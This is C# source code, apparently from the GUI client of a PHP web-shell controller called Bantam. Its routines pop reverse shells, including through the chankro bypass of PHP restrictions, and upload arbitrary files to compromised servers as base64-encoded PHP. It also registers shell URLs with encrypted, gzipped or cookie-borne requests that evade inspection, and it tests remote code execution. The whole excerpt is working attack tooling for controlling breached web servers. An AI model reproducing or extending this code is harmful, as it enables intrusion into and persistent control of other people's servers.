/// <summary>
/// Task wrapper for popping reverse shell without chankro
/// </summary>
/// <param name="shellCode"></param>
private async Task PopReverseShell(string shellCode)
{
string phpCode = PhpBuilder.ExecuteSystemCode(shellCode, false);
await Task.Run(() => WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode, true).ConfigureAwait(false));
if (checkBoxLogShellCode.Checked)
{
LogHelper.AddShellLog(ShellUrl, "Attempted to pop chankro reverse shell with [ " + shellCode + " ] ", LogHelper.LOG_LEVEL.REQUESTED);
}
}
/// <summary>
/// Main upload routine
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private async void btnUpload_Click(object sender, EventArgs e)
{
string phpCode = string.Empty;
btnBrowse.Enabled = false;
btnUpload.Enabled = false;
richTextBox1.Enabled = false;
if (EditingSelf)
{
if (!string.IsNullOrEmpty(richTextBox1.Text))
{
phpCode = Helper.EncodeBase64ToString(richTextBox1.Text);
}
else
{
LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data to self...", LogHelper.LOG_LEVEL.INFO);
btnUpload.Enabled = true;
return;
}
phpCode = PhpBuilder.WriteFileVar(PhpBuilder.phpServerScriptFileName, phpCode);
}
else
{
if (!string.IsNullOrEmpty(LocalFileLocation))
{
phpCode = Convert.ToBase64String(File.ReadAllBytes(LocalFileLocation));
}
else if (!string.IsNullOrEmpty(richTextBox1.Text))
{
phpCode = Helper.EncodeBase64ToString(richTextBox1.Text);
}
else
{
LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data...", LogHelper.LOG_LEVEL.INFO);
btnUpload.Enabled = true;
return;
}
string remoteFileLocation = ServerPath + "/" + txtBoxFileName.Text;
phpCode = PhpBuilder.WriteFile(remoteFileLocation, phpCode);
}
await WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode);
btnUpload.Enabled = true;
btnBrowse.Enabled = true;
richTextBox1.Enabled = true;
this.Close();
}
/// <summary>
/// Task wrapper for spawning a chankro shell
/// </summary>
/// <param name="phpCode"></param>
private async Task PopChankroShell(string phpCode)
{
await Task.Run(() => WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode, true).ConfigureAwait(false));
}
/// <summary>
/// Main add shell/host To GUI routine
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private async void btnAddShell_Click(object sender, EventArgs e)
{
string shellURL = txtBoxShellUrl.Text;
if (string.IsNullOrEmpty(shellURL))
{
return;
}
if (checkBoxEncryptRequest.Checked)
{
string encryptionKey = textBoxEncrpytionKey.Text;
if (encryptionKey.Length != 32)
{
labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again.";
return;
}
if (!checkBoxSendIVInRequest.Checked)
{
string encryptionIV = textBoxEncrpytionIV.Text;
if (string.IsNullOrEmpty(encryptionIV) || encryptionIV.Length != 16)
{
labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again.";
return;
}
}
}
//Remove Shell
if (BantamMain.Shells.ContainsKey(shellURL))
{
BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL);
if (!BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut))
{
LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
return;
}
}
//Add Shell
if (!BantamMain.Shells.TryAdd(shellURL, new ShellInfo()))
{
LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
return;
}
BantamMain.Shells[shellURL].RequestArgName = txtBoxArgName.Text;
if (comboBoxVarType.Text == "cookie")
{
BantamMain.Shells[shellURL].SendDataViaCookie = true;
}
if (checkBoxResponseEncryption.Checked == false)
{
BantamMain.Shells[shellURL].ResponseEncryption = false;
}
else
{
BantamMain.Shells[shellURL].ResponseEncryption = true;
BantamMain.Shells[shellURL].ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex;
}
if (checkBoxGZipRequest.Checked)
{
BantamMain.Shells[shellURL].GzipRequestData = true;
}
else
{
BantamMain.Shells[shellURL].GzipRequestData = false;
}
bool encryptResponse = BantamMain.Shells[shellURL].ResponseEncryption;
int ResponseEncryptionMode = BantamMain.Shells[shellURL].ResponseEncryptionMode;
if (checkBoxEncryptRequest.Checked)
{
BantamMain.Shells[shellURL].RequestEncryption = true;
BantamMain.Shells[shellURL].RequestEncryptionKey = textBoxEncrpytionKey.Text;
if (checkBoxSendIVInRequest.Checked)
{
BantamMain.Shells[shellURL].SendRequestEncryptionIV = true;
BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty;
BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = textBoxIVVarName.Text;
}
else
{
BantamMain.Shells[shellURL].RequestEncryptionIV = textBoxEncrpytionIV.Text;
BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
}
}
else
{
BantamMain.Shells[shellURL].RequestEncryption = false;
BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
BantamMain.Shells[shellURL].RequestEncryptionIV = string.Empty;
BantamMain.Shells[shellURL].RequestEncryptionKey = string.Empty;
}
string phpCode = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse);
ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode);
if (string.IsNullOrEmpty(response.Result))
{
labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
return;
}
string result = response.Result;
if (encryptResponse)
{
result = CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, ResponseEncryptionMode);
}
if (string.IsNullOrEmpty(result) || result != "1")
{
labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
return;
}
BantamMain.Instance.InitializeShellData(shellURL);
this.Close();
}
